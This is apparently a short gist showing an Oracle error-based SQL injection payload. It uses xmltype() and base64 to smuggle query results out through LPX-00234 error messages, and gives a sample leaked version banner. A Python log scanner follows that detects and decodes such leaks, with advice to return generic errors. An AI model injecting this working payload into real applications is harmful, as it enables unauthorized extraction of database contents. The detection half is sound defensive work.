Optimized Oracle error-based SQL injection technique via xmltype() + base64
/*
 * @description: Optimized Oracle error-based SQLi via xmltype() + base64 (up to 162 bytes/req)
 * @author: xassiz
 */
select ''||
  xmltype('<'||
    regexp_replace(
      utl_raw.cast_to_varchar2(
        utl_encode.base64_encode(
          utl_raw.cast_to_raw(
            (select banner from v$version where banner like 'Oracle%') --> your query here
          )
        )
      )
      ||':x>',
      chr(10)||'|'||chr(13)||'|=','')
  )
||'' from dual
/*
  Example:
    ORA-19202: Error occurred in XML processing LPX-00234: namespace prefix "T3JhY2xlIERhdGFiYXNlIDExZyBFeHByZXNzIEVkaXRpb24gUmVsZWFzZSAxMS4yLjAuMi4wIC0gNjRiaXQgUHJvZHVjdGlvbg" is not declared
      |
      \--> base64_decode() = 'Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production'
*/
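
The error text above is also a log signature. The following is an added example, not part of the gist: it scans database or application error logs for LPX-00234 messages whose quoted prefix decodes as unpadded base64 and recovers what each request leaked. The function names, the sample log and the 8-character threshold are assumptions of this example.

```python
import base64
import binascii
import re

# LPX-00234 echoes the undeclared namespace prefix. With the query above the
# prefix is base64 text whose CR, LF and '=' were removed by regexp_replace.
# The 8-character minimum is an assumed threshold to skip short real prefixes.
LPX_PREFIX = re.compile(
    r'LPX-00234: namespace prefix "([A-Za-z0-9+/]{8,})" is not declared')

def decode_stripped_b64(token):
    """Decode base64 that lost its '=' padding; return None if it is not base64."""
    if len(token) % 4 == 1:          # no byte string encodes to this length
        return None
    try:
        return base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None

def find_leaks(lines):
    """Return (line_number, decoded_text) for errors that carried readable data."""
    hits = []
    for number, line in enumerate(lines, 1):
        for match in LPX_PREFIX.finditer(line):
            raw = decode_stripped_b64(match.group(1))
            if raw is None:
                continue
            try:
                text = raw.decode("utf-8")   # assumption: leaked data is UTF-8 text
            except UnicodeDecodeError:
                continue                     # ordinary prefix that only looks like base64
            if all(c.isprintable() or c in "\t\r\n" for c in text):
                hits.append((number, text))
    return hits

# Constructed sample log: line 2 is the error message from the gist's example,
# lines 1 and 3 are made-up benign errors.
SAMPLE_LOG = [
    'ORA-00942: table or view does not exist',
    'ORA-19202: Error occurred in XML processing LPX-00234: namespace prefix '
    '"T3JhY2xlIERhdGFiYXNlIDExZyBFeHByZXNzIEVkaXRpb24gUmVsZWFzZSAxMS4yLjAuMi4wIC0gNjRiaXQgUHJvZHVjdGlvbg" is not declared',
    'ORA-19202: Error occurred in XML processing LPX-00234: namespace prefix '
    '"soapenvelope" is not declared',
]

if __name__ == "__main__":
    for number, text in find_leaks(SAMPLE_LOG):
        print(f"line {number}: error message carried {text!r}")
```

Returning raw ORA/LPX error text to clients is what makes this channel usable, so any hit from this scan also identifies an endpoint that should return a generic error instead.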